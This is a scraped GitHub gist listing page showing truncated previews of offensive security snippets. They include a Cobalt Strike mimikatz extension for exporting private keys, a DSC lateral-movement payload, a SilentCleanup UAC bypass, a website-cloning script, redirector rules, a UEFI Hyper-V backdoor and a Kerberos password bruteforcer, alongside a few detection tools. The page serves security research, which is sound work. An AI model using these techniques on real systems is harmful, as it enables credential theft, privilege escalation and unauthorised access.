Skip to content

Instantly share code, notes, and snippets.


James Hovious JamesHovious

View GitHub Profile
tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
View mmimikatz.cna
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
# cmd separator is |
# practical example: export machine certificates (including non-exportable private key :)):
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
makelariss /
Last active June 17, 2021 21:13
Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
Mr-Un1k0d3r /
Created November 7, 2017 16:14
Lazy website cloning
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
mattifestation / WDAG_CI_Policy.xml
Created October 18, 2017 21:59
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
View WDAG_CI_Policy.xml
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="" xmlns:xsi="" xmlns="urn:schemas-microsoft-com:sipolicy">
curi0usJack / .htaccess
Last active June 3, 2023 10:19
View .htaccess
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
# Note this version requires Apache 2.4+
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
# Include /etc/apache2/redirect.rules
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active November 10, 2022 21:52
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
View Get-KerberosTicketGrantingTicket.ps1
function Get-KerberosTicketGrantingTicket
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
williballenthin / stackstrings.yara
Last active March 15, 2023 21:27
match x86 that appears to be stack string creation
View stackstrings.yara
rule stack_strings
author = "William Ballenthin"
email = ""
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
Cr4sh / DmaHvBackdoor.c
Last active February 20, 2023 08:21
Hyper-V backdoor for UEFI
View DmaHvBackdoor.c
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
ropnop /
Last active June 6, 2021 18:23
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful